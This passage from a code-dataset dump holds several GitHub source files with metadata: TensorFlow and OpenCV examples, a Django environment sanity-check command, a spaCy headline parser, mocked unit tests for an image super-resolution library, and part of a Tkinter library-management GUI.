* train_X + np.random.randn(*train_X.shape) * 0.3 # y = 2x, with added noise\n yield train_X, train_Y # return as a generator\n\n# Define the model structure; here it is only placeholder tensors\nXinput = tf.placeholder(\"float\",(None)) # define two placeholders to receive the data\nYinput = tf.placeholder(\"float\",(None))\n\n# Create a session, then fetch and print the data\ntraining_epochs = 20 # number of iterations to run\nwith tf.Session() as sess: # create the session\n for epoch in range(training_epochs): # iterate over the dataset 20 times\n for x, y in GenerateData(): # print all the points via the for loop\n xv,yv = sess.run([Xinput,Yinput],feed_dict={Xinput: x, Yinput: y}) # inject the data into the static graph\n\n print(epoch,\"| x.shape:\",np.shape(xv),\"| x[:3]:\",xv[:3])\n print(epoch,\"| y.shape:\",np.shape(yv),\"| y[:3]:\",yv[:3])\n \n \n# Plot the simulated data points\ntrain_data =list(GenerateData())[0]\nplt.plot(train_data[0], train_data[1], 'ro', label='Original data')\nplt.legend()\nplt.show()", "repo_name": "aianaconda/TensorFlow_Engineering_Implementation", "sub_path": 
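The record above is TF1-style graph code (tf.placeholder plus Session.run with feed_dict). On a TF2 installation the same injection pattern needs the compat shim; a minimal sketch, assuming TF2 is installed:

import numpy as np
import tensorflow.compat.v1 as tf

tf.disable_v2_behavior()  # restore graph mode so placeholders are legal

x_in = tf.placeholder(tf.float32, shape=(None,))
y_in = tf.placeholder(tf.float32, shape=(None,))

with tf.Session() as sess:
    # Placeholders simply echo whatever arrays are injected via feed_dict.
    xv, yv = sess.run([x_in, y_in],
                      feed_dict={x_in: np.arange(3.0), y_in: 2 * np.arange(3.0)})
    print(xv, yv)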
"code/4-1 将模拟数据制作成内存对象数据集.py", "file_name": "4-1 将模拟数据制作成内存对象数据集.py", "file_ext": "py", "file_size_in_byte": 1583, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 222, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.linspace", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "72495045885", "text": "# -*- coding: utf-8 -*-\nimport textwrap\nfrom django.conf import settings\nfrom django.core.management.base import NoArgsCommand\nfrom trytry.core.utils.call import call\n\n\n\n\nclass Command(NoArgsCommand):\n\n help = (\"This command checks whether your current environment is fully \"\n \"conformed with the application requirements\")\n\n def handle_noargs(self, **options):\n self.style.ERR = self.style.NOTICE\n self.style.OK = self.style.SQL_COLTYPE\n self.style.INFO = self.style.SQL_KEYWORD\n\n def _write_line(style, prefix, line):\n chunks = textwrap.wrap(line, break_on_hyphens=False)\n for chunk in chunks:\n self.stdout.write(style(prefix))\n self.stdout.write(style(chunk))\n self.stdout.write('\\n')\n prefix = ' ' * len(prefix)\n\n for k in dir(self):\n if k.startswith('check_'):\n v = getattr(self, k)\n if not callable(v):\n continue\n out = v()\n if not out:\n continue # test is not applicable\n status, result = out\n test_name = v.__doc__ and v.__doc__.strip() + ': ' or ''\n line = '{0}{1}'.format(test_name, result)\n if status is True:\n _write_line(self.style.OK, '[ OK ] ', line)\n elif status is False:\n _write_line(self.style.ERR, '[ ERR] ', line)\n else:\n _write_line(self.style.INFO, '[INFO] ', line)\n\n def check_sudo(self):\n \"\"\" Sudo support \"\"\"\n _, _, code = call('sudo whoami')\n reason = 'Feature is required to support LXC'\n if code == 0:\n return ok('User can execute command with sudo. {0}'.format(reason))\n else:\n if settings.TRYTRY_LXC_ENABLED:\n return err('User CANNOT execute command with sudo. {0}'.format(reason))\n else:\n return info('User cannot execute command with sudo. {0}'.format(reason))\n\n\n def check_lxc_enabled(self):\n enabled = 'enabled' if settings.TRYTRY_LXC_ENABLED else 'disabled'\n return info('You have settings.TRYTRY_LXC_ENABLED variable {0}. '\n 'You can change its value in your localsettings.py'.format(enabled))\n\n\n def check_timelimit(self):\n \"\"\" Command timelimit \"\"\"\n out, _, code = call('which timelimit')\n reason = ('This command is used to limit the maximum time span '\n 'of command execution. ')\n if code == 0:\n return ok('Command {0} found. 
{1}'.format(out, reason))\n else:\n return err('Command \"timelimit\" is not found. {0}'\n 'Ubuntu and Debian users can set it up with '\n '\"apt-get install timelimit\"'.format(reason))\n\n def check_lxc_commands(self):\n \"\"\" LXC userspace support \"\"\"\n if settings.TRYTRY_LXC_ENABLED:\n out, _, code = call('which lxc')\n reason = 'This command is the indicator whether the LXC module is set up'\n if code == 0:\n return ok('Command {0} found. {1}'.format(out, reason))\n else:\n return err('Command \"lxc\" is not found. {0}. Ubuntu and Debian '\n 'users can set it up with \"apt-get install lxc\". See '\n 'http://try-try.readthedocs.org/en/latest/lxc.html '\n 'for more details'.format(reason))\n\ndef ok(text):\n return (True, text)\n\ndef err(text):\n return (False, text)\n\ndef info(text):\n return (None, text)\n", "repo_name": "imankulov/trytry", "sub_path": "trytry/core/management/commands/trytry_sanity_check.py", "file_name": "trytry_sanity_check.py", "file_ext": "py", "file_size_in_byte": 3680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.core.management.base.NoArgsCommand", "line_number": 10, "usage_type": "name"}, {"api_name": "textwrap.wrap", "line_number": 21, "usage_type": "call"}, {"api_name": "trytry.core.utils.call.call", "line_number": 48, "usage_type": "call"}, {"api_name": "django.conf.settings.TRYTRY_LXC_ENABLED", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "django.conf.settings.TRYTRY_LXC_ENABLED", "line_number": 60, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 60, "usage_type": "name"}, {"api_name": "trytry.core.utils.call.call", "line_number": 67, "usage_type": "call"}, {"api_name": "django.conf.settings.TRYTRY_LXC_ENABLED", "line_number": 79, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 79, "usage_type": "name"}, {"api_name": "trytry.core.utils.call.call", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "13787472220", "text": "import cv2\r\n\r\ncap = cv2.VideoCapture('video8.mp4')\r\n\r\nwhile not cap.isOpened():\r\n pass\r\n\r\nfps = int(cap.get(cv2.CAP_PROP_FPS))\r\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\noutput_filename = 'output_video.mp4'\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter(output_filename, fourcc, fps, (width, height))\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n\r\n cv2.putText(frame, f\"Width: {width}, Height: {height}, FPS: {fps}\",\r\n (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)\r\n cv2.namedWindow('Video', cv2.WINDOW_NORMAL)\r\n cv2.imshow('Video', frame)\r\n\r\n out.write(frame) # Write the frame to the output video\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('w'):\r\n break\r\n\r\ncap.release()\r\nout.release() # Release the output video writer\r\ncv2.destroyAllWindows()\r\n", "repo_name": "nisanuralici/gitek_internship", "sub_path": "Video_okuma_fps_height_width_degerleri/videookuma.py", "file_name": "videookuma.py", "file_ext": "py", "file_size_in_byte": 896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "cv2.VideoCapture", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", 
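One caveat on the capture loop above: it pairs an 'XVID' fourcc with an .mp4 filename. XVID conventionally goes into .avi containers, while 'mp4v' is the usual fourcc for .mp4 output. A minimal sketch with a matched container and codec (paths illustrative):

import cv2

cap = cv2.VideoCapture('input.mp4')
fps = int(cap.get(cv2.CAP_PROP_FPS))
size = (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),
        int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))

# 'mp4v' matches the .mp4 container; keep 'XVID' for .avi instead.
out = cv2.VideoWriter('output.mp4', cv2.VideoWriter_fourcc(*'mp4v'), fps, size)

while True:
    ok, frame = cap.read()
    if not ok:
        break
    out.write(frame)

cap.release()
out.release()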
"line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "26268402319", "text": "\n\nimport re\nimport spacy\nimport os\n\nfrom spacy.tokens import Token, Span, Doc\nfrom functools import reduce\nfrom boltons.iterutils import pairwise\n\n\ndef load_blocklist(path):\n \"\"\"Read block list, or empty set.\n \"\"\"\n try:\n with open(path) as fh:\n return set(fh.read().splitlines())\n\n except:\n return set()\n\n\nBLOCKLIST_PATH = os.path.join(os.path.dirname(__file__), 'blocklist.txt')\nBLOCKLIST = load_blocklist(BLOCKLIST_PATH)\n\n\n# TODO: What to do with \"/\"?\n\n\nQUOTES = (('“', '\"'), ('”', '\"'), ('‘', \"'\"), ('’', \"'\"))\n\ndef standardize_quotes(text):\n \"\"\"Curly -> straight.\n \"\"\"\n for special, standard in QUOTES:\n text = text.replace(special, standard)\n\n return text\n\n\n# http://jkorpela.fi/dashes.html\nHYPHENS = {u'\\u002D', u'\\u2010', u'\\u2011', u'\\u2212', u'\\uFE63'}\n\ndef standardize_hyphens(text):\n \"\"\"Hyphen variants -> \"-\".\n \"\"\"\n for h in HYPHENS:\n text = text.replace(h, '-')\n\n # Drop infix hyphens.\n text = re.sub('([^\\s])-([^\\s])', r'\\1 \\2', text)\n\n return text\n\n\ndef standardize_and(text):\n return text.replace(' & ', ' and ')\n\n\ndef drop_twitter_chars(text):\n return re.sub('[@#]', '', text)\n\n\nSTANDARDIZERS = (\n standardize_quotes,\n standardize_hyphens,\n standardize_and,\n drop_twitter_chars,\n)\n\ndef standardize_text(text):\n return reduce(lambda t, func: func(t), STANDARDIZERS, text)\n\n\n# Headlines can contain letters, digits, \".,;\", \"?!\", \"$%,\"\" and spaces.\nBREAK_CHAR_PATTERN = '[^a-z0-9\\s\\.,;\\?!\\'\"\\$%]'\n\n# Regular tokens that constitute a break.\nALPHA_BREAK_TOKENS = {'via'}\n\ndef is_break_token(token):\n \"\"\"Does the token constitute a \"sentence\" break?\n \"\"\"\n text = token.text.lower()\n\n has_break_char = bool(re.search(BREAK_CHAR_PATTERN, text))\n is_alpha_break_token = text in ALPHA_BREAK_TOKENS\n\n return has_break_char or is_alpha_break_token\n\n\n# For the classifier, drop everything except letters, numbers, and $.\nCLF_REMOVED_CHAR_PATTERN = '[^a-z0-9\\$%]'\n\ndef token_clf_text(token):\n \"\"\"Drop everything but letters, numbers, and currency ($.,)\n \"\"\"\n # Drop everything but letters, numbers, $.\n text = re.sub(CLF_REMOVED_CHAR_PATTERN, '', token.text.lower())\n\n # Digits -> '#'.\n text = re.sub('[0-9]+', '#', text)\n\n return text\n\n\ndef span_clf_text(span):\n return ' '.join(t._.clf_text for t in span if t._.clf_text).strip()\n\n\ndef break_idxs(doc):\n \"\"\"Locations of break tokens, with left/right bookends.\n \"\"\"\n return [-1, *[t.i for t in doc if t._.is_break_token], len(doc)]\n\n\ndef spans(doc):\n \"\"\"Pull apart separator-delimited spans.\n \"\"\"\n return [doc[i1+1:i2] for i1, i2 in 
pairwise(doc._.break_idxs)]\n\n\ndef span_clf_texts(doc):\n \"\"\"Join spans -> clf strings, drop empty strings.\n \"\"\"\n texts = [span._.clf_text for span in doc._.spans]\n return tuple(filter(bool, texts))\n\n\ndef longest_unbroken_span(doc):\n \"\"\"Find the longest span of tokens without a break token.\n \"\"\"\n return sorted(doc._.spans, key=lambda s: len(s), reverse=True)[0]\n\n\ndef clf_tokens(doc):\n \"\"\"Get filtered tokens for classifier.\n \"\"\"\n return [\n token\n for span in doc._.spans\n if span._.clf_text and span._.clf_text not in BLOCKLIST\n for token in span\n if token._.clf_text\n ]\n\n\ndef clf_token_texts(doc):\n return [t._.clf_text for t in doc._.clf_tokens]\n\n\nToken.set_extension('is_break_token', getter=is_break_token)\nToken.set_extension('clf_text', getter=token_clf_text)\n\nSpan.set_extension('clf_text', getter=span_clf_text)\n\nDoc.set_extension('break_idxs', getter=break_idxs)\nDoc.set_extension('spans', getter=spans)\nDoc.set_extension('span_clf_texts', getter=span_clf_texts)\nDoc.set_extension('longest_unbroken_span', getter=longest_unbroken_span)\nDoc.set_extension('clf_tokens', getter=clf_tokens)\nDoc.set_extension('clf_token_texts', getter=clf_token_texts)\n\nnlp = spacy.load('en', disable=['ner', 'parser', 'tagger'])\n\n\ndef parse_headline(text):\n return nlp(standardize_text(text))\n", "repo_name": "davidmcclure/headline-parser", "sub_path": "headline_parser.py", "file_name": "headline_parser.py", "file_ext": "py", "file_size_in_byte": 4014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 51, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 61, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 72, "usage_type": "call"}, {"api_name": "re.search", "line_number": 86, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 99, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 102, "usage_type": "call"}, {"api_name": "boltons.iterutils.pairwise", "line_number": 120, "usage_type": "call"}, {"api_name": "spacy.tokens.Token.set_extension", "line_number": 152, "usage_type": "call"}, {"api_name": "spacy.tokens.Token", "line_number": 152, "usage_type": "name"}, {"api_name": "spacy.tokens.Token.set_extension", "line_number": 153, "usage_type": "call"}, {"api_name": "spacy.tokens.Token", "line_number": 153, "usage_type": "name"}, {"api_name": "spacy.tokens.Span.set_extension", "line_number": 155, "usage_type": "call"}, {"api_name": "spacy.tokens.Span", "line_number": 155, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 157, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 157, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 158, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 158, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 159, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 159, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 160, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 160, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", 
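The getter-backed extensions registered above on Token, Span and Doc are standard spaCy machinery; values are computed lazily on access through the underscore namespace. A self-contained illustration (the attribute name and pipeline here are made up for the example):

import spacy
from spacy.tokens import Doc

nlp = spacy.blank('en')  # lightweight tokenizer-only pipeline

# Register once; re-registering the same name raises unless force=True.
if not Doc.has_extension('n_alpha'):
    Doc.set_extension('n_alpha', getter=lambda doc: sum(t.is_alpha for t in doc))

doc = nlp('Fed raises rates 0.25%')
print(doc._.n_alpha)  # -> 3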
"line_number": 161, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 161, "usage_type": "name"}, {"api_name": "spacy.tokens.Doc.set_extension", "line_number": 162, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 162, "usage_type": "name"}, {"api_name": "spacy.load", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "23951933030", "text": "import logging\nimport os\nimport unittest\n\nimport yaml\nfrom unittest.mock import patch\n\nfrom ISR import assistant\n\n\nclass Object:\n def __init__(self, *args, **kwargs):\n self.scale = 0\n self.patch_size = 0\n pass\n \n def make_model(self, *args, **kwargs):\n return self\n \n def train(self, *args, **kwargs):\n return True\n \n def get_predictions(self, *args, **kwargs):\n return True\n\n\nclass RunFunctionTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n logging.disable(logging.CRITICAL)\n conf = yaml.load(open(os.path.join('tests', 'data', 'config.yml'), 'r'))\n conf['default'] = {\n 'feature_extractor': False,\n 'discriminator': False,\n 'generator': 'rdn',\n 'training_set': 'test',\n 'test_set': 'test',\n }\n conf['session'] = {}\n conf['session']['training'] = {}\n conf['session']['training']['patch_size'] = 0\n conf['session']['training']['epochs'] = 0\n conf['session']['training']['steps_per_epoch'] = 0\n conf['session']['training']['batch_size'] = 0\n conf['session']['prediction'] = {}\n conf['session']['prediction']['patch_size'] = 5\n conf['generators'] = {}\n conf['generators']['rdn'] = {}\n conf['generators']['rdn']['x'] = 0\n conf['training_sets'] = {}\n conf['training_sets']['test'] = {}\n conf['training_sets']['test']['lr_train_dir'] = None\n conf['training_sets']['test']['hr_train_dir'] = None\n conf['training_sets']['test']['lr_valid_dir'] = None\n conf['training_sets']['test']['hr_valid_dir'] = None\n conf['loss_weights'] = None\n conf['training_sets']['test']['data_name'] = None\n conf['log_dirs'] = {}\n conf['log_dirs']['logs'] = None\n conf['log_dirs']['weights'] = None\n conf['weights_paths'] = {}\n conf['weights_paths']['generator'] = 'a/path/rdn-C1-D6-G1-G02-x0-weights.hdf5'\n conf['weights_paths']['discriminator'] = 'a/path/rdn-weights.hdf5'\n conf['session']['training']['n_validation_samples'] = None\n conf['session']['training']['metrics'] = None\n conf['session']['training']['learning_rate'] = {}\n conf['session']['training']['adam_optimizer'] = None\n conf['session']['training']['flatness'] = None\n conf['session']['training']['fallback_save_every_n_epochs'] = None\n conf['session']['training']['monitored_metrics'] = None\n conf['losses'] = None\n cls.conf = conf\n \n @classmethod\n def tearDownClass(cls):\n pass\n \n def setUp(self):\n pass\n \n def tearDown(self):\n pass\n \n @patch('ISR.assistant._get_module', return_value=Object())\n @patch('ISR.train.trainer.Trainer', return_value=Object())\n def test_run_arguments_trainer(self, trainer, _get_module):\n with patch('yaml.load', return_value=self.conf):\n assistant.run(\n config_file='tests/data/config.yml', training=True, prediction=False, default=True\n )\n trainer.assert_called_once()\n \n @patch('ISR.assistant._get_module', return_value=Object())\n @patch('ISR.predict.predictor.Predictor', return_value=Object())\n def test_run_arguments_predictor(self, predictor, _get_module):\n with patch('yaml.load', return_value=self.conf):\n assistant.run(\n config_file='tests/data/config.yml', training=False, prediction=True, default=True\n )\n predictor.assert_called_once()\n", "repo_name": 
"idealo/image-super-resolution", "sub_path": "tests/assistant/test_assistant.py", "file_name": "test_assistant.py", "file_ext": "py", "file_size_in_byte": 3597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4348, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 27, "usage_type": "attribute"}, {"api_name": "logging.disable", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 30, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 87, "usage_type": "call"}, {"api_name": "ISR.assistant.run", "line_number": 88, "usage_type": "call"}, {"api_name": "ISR.assistant", "line_number": 88, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 84, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 85, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 96, "usage_type": "call"}, {"api_name": "ISR.assistant.run", "line_number": 97, "usage_type": "call"}, {"api_name": "ISR.assistant", "line_number": 97, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 93, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "22802590357", "text": "from tkinter import *\r\nfrom tkinter import ttk\r\nimport datetime\r\nfrom tkinter import messagebox\r\nimport tkinter\r\nimport mysql.connector\r\n\r\n\r\n\r\n\r\nclass LibraryMangementSystem:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Library Management System\")\r\n self.root.geometry(\"1500x800\")\r\n \r\n #=============Variable==================\r\n \r\n self.member=StringVar()\r\n self.prn=StringVar()\r\n self.id=StringVar()\r\n self.firstname=StringVar()\r\n self.lastname=StringVar()\r\n self.adress1=StringVar()\r\n self.adress2=StringVar()\r\n self.postcode=StringVar()\r\n self.mobile=StringVar()\r\n self.bookid=StringVar()\r\n self.booktittle=StringVar()\r\n self.author=StringVar()\r\n self.dateborrowed=StringVar()\r\n self.datedue=StringVar()\r\n self.daysonbook=StringVar()\r\n self.latefine=StringVar()\r\n self.dateoverdue=StringVar()\r\n self.finalprice=StringVar()\r\n \r\n \r\n #=======================================================================================================================\r\n\r\n lbltitle = Label(self.root, bd=20, relief=RIDGE, text=\"Library Management System\",\r\n fg=\"maroon\", bg=\"powder blue\", font=(\"times new roman\", 50, \"bold\"))\r\n lbltitle.pack(side=TOP, fill=X)\r\n\r\n # ==================DATA FRAME==================\r\n DataFrame = Frame(self.root, bd=20, relief=RIDGE,bg=\"powder blue\")\r\n DataFrame.place(x=0, y=130, width=1530, height=400)\r\n\r\n DataFrameLeft = LabelFrame(DataFrame, bd=10, relief=RIDGE, padx=10,\r\n font=(\"times new roman\", 12, \"bold\"), text=\"Library Members\")\r\n DataFrameLeft.place(x=0, y=5, width=910, height=350)\r\n\r\n DataFrameRight = LabelFrame(DataFrame, bd=10, relief=RIDGE, padx=10,\r\n font=(\"times new roman\", 12, \"bold\"), text=\"Book Details\")\r\n DataFrameRight.place(x=930, y=5, width=530, height=350)\r\n\r\n # ================Buttons Frame===================\r\n\r\n ButtonFrame = Frame(self.root, bd=20, relief=RIDGE,\r\n padx=20, bg=\"powder blue\")\r\n 
ButtonFrame.place(x=0, y=530, width=1530, height=70)\r\n\r\n # ================Details Frame===================\r\n\r\n DetailsFrame = Frame(self.root, bd=20, relief=RIDGE, padx=2)\r\n DetailsFrame.place(x=0, y=600, width=1530, height=190)\r\n \r\n \r\n \r\n\r\n # ================Data Frame Left===================\r\n \r\n \r\n\r\n lblMember = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"),text=\"Member\", padx=2)\r\n lblMember.grid(row=0, column=0)\r\n\r\n comMember = ttk.Combobox(\r\n DataFrameLeft, state=\"readonly\", font=(\"arial\", 12, \"bold\"),textvariable=self.member, width=33)\r\n comMember[\"values\"] = (\"Admin\", \"Student\", \"Teacher\")\r\n comMember.current(0)\r\n comMember.grid(row=0, column=1)\r\n\r\n lblPrn = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Reg Number \", padx=2)\r\n lblPrn.grid(row=1, column=0, sticky=W)\r\n txtPrn = Entry(DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.prn, width=35)\r\n txtPrn.grid(row=1, column=1)\r\n\r\n lblIdNo = Label(DataFrameLeft, font=(\"arial\", 12, \"bold\"),\r\n text=\"Id Number \", padx=2, pady=4)\r\n lblIdNo.grid(row=2, column=0, sticky=W)\r\n txtIdNo = Entry(DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.id, width=35)\r\n txtIdNo.grid(row=2, column=1)\r\n\r\n lblFirstName = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"First Name \", padx=2, pady=6)\r\n lblFirstName.grid(row=3, column=0, sticky=W)\r\n txtFirstName = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.firstname, width=35)\r\n txtFirstName.grid(row=3, column=1)\r\n\r\n lblLastName = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"),text=\"Last Name \", padx=2, pady=6)\r\n lblLastName.grid(row=4, column=0, sticky=W)\r\n txtLastName = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.lastname , width=35)\r\n txtLastName.grid(row=4, column=1)\r\n\r\n lblAddress1 = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Address1\", padx=2, pady=6)\r\n lblAddress1.grid(row=5, column=0, sticky=W)\r\n txtAddress1 = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.adress1, width=35)\r\n txtAddress1.grid(row=5, column=1)\r\n\r\n lblAddress2 = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Address2 \", padx=2, pady=6)\r\n lblAddress2.grid(row=6, column=0, sticky=W)\r\n txtAddress2 = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.adress2, width=35)\r\n txtAddress2.grid(row=6, column=1)\r\n\r\n lblPostCode = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Post Code \", padx=2, pady=4)\r\n lblPostCode.grid(row=7, column=0, sticky=W)\r\n txtPostCode = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.postcode, width=35)\r\n txtPostCode.grid(row=7, column=1)\r\n\r\n lblMobileNo = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Mobile \", padx=2, pady=6)\r\n lblMobileNo.grid(row=8, column=0, sticky=W)\r\n txtMobileNo = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.mobile, width=35)\r\n txtMobileNo.grid(row=8, column=1)\r\n\r\n lblBookId = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Book Id \", padx=2)\r\n lblBookId.grid(row=0, column=2, sticky=W)\r\n txtBookId = Entry(DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.bookid, width=35)\r\n txtBookId.grid(row=0, column=3)\r\n\r\n lblBookTittle = Label(DataFrameLeft, font=(\r\n \"arial\", 12, 
\"bold\"), text=\"Book Tittle \", padx=2, pady=6)\r\n lblBookTittle.grid(row=1, column=2, sticky=W)\r\n txtBookTittle = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.booktittle, width=35)\r\n txtBookTittle.grid(row=1, column=3)\r\n\r\n lblAuthorName = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Author \", padx=2, pady=6)\r\n lblAuthorName.grid(row=2, column=2, sticky=W)\r\n txtAuthorName = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.author, width=35)\r\n txtAuthorName.grid(row=2, column=3)\r\n\r\n lblDateOfBorrowed = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Date Borrowed \", padx=2, pady=6)\r\n lblDateOfBorrowed.grid(row=3, column=2, sticky=W)\r\n txtDateOfBorrowed = Entry(\r\n DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.dateborrowed, width=35)\r\n txtDateOfBorrowed.grid(row=3, column=3)\r\n\r\n lblDateDue = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"),text=\"Date Due \", padx=2, pady=6)\r\n lblDateDue.grid(row=4, column=2, sticky=W)\r\n txtDateDue = Entry(DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.datedue, width=35)\r\n txtDateDue.grid(row=4, column=3)\r\n\r\n lblDaysOnBook = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Days On Book \", padx=2, pady=6)\r\n lblDaysOnBook.grid(row=5, column=2, sticky=W)\r\n txtDaysOnBook = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.daysonbook, width=35)\r\n txtDaysOnBook.grid(row=5, column=3)\r\n\r\n lblLateReturnFine = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Late Return Fine\", padx=2, pady=6)\r\n lblLateReturnFine.grid(row=6, column=2, sticky=W)\r\n txtLateReturnFine = Entry(\r\n DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.latefine, width=35)\r\n txtLateReturnFine.grid(row=6, column=3)\r\n\r\n lblDateOverDue = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"),text=\"Date Over Due \", padx=2, pady=6)\r\n 